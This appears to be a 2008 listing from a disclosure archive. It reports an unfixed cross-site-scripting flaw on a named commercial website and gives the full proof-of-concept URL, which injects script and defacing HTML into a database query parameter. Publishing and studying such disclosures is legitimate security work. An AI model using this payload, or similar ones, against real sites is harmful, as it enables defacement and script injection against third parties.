Security researcher xerces, has submitted on 10/07/2008 a cross-site-scripting (XSS) vulnerability affecting www.bonbonweb.com, which at the time of submission ranked 1439886 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/07/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 10/07/2008 |
Date published: 12/07/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: xerces |
Domain: www.bonbonweb.com |
Category: XSS |
Pagerank: 1439886 |
URL: http://www.bonbonweb.com/wdBox/ASPGlobal/wdb_lb.asp?Args=DATA:bonbonweb$TABLE:ListeRecherche$DOSSIER :bonbonweb$HTMR:result$WHERE:%20((MotsclefPRech%20Like%20%22*%22%3E%3Cscript%3Ealert(1337)%3C/script %3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20xerces%3C/h1%3E%3C/marquee%3E*%22)%20OR%20(((DesignationP%20Li ke%20%22*%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20xerces%3C/h1%3 E%3C/marquee%3E*%22)%20OR%20(LibelleSF%20Like%20%22*%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3C marquee%3E%3Ch1%3EXSS%20by%20xerces%3C/h1%3E%3C/marquee%3E*%22)%20OR%20(DescriptifP%20Like%20%22*%22 %3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20xerces%3C/h1%3E%3C/marquee %3E*%22)%20OR%20(ReferenceA%20Like%20%22*%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E% 3Ch1%3EXSS%20by%20xerces%3C/h1%3E%3C/marquee%3E*%22))%20AND%20((MotsclefP%20not%20Like%20%22*%22%3E% 3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20xerces%3C/h1%3E%3C/marquee%3E* %22)%20OR%20(MotsclefP%20is%20null)%20%20OR%20(MotsclefP%20=%20%22%22)))) |
Click here to view the mirror
|
|
|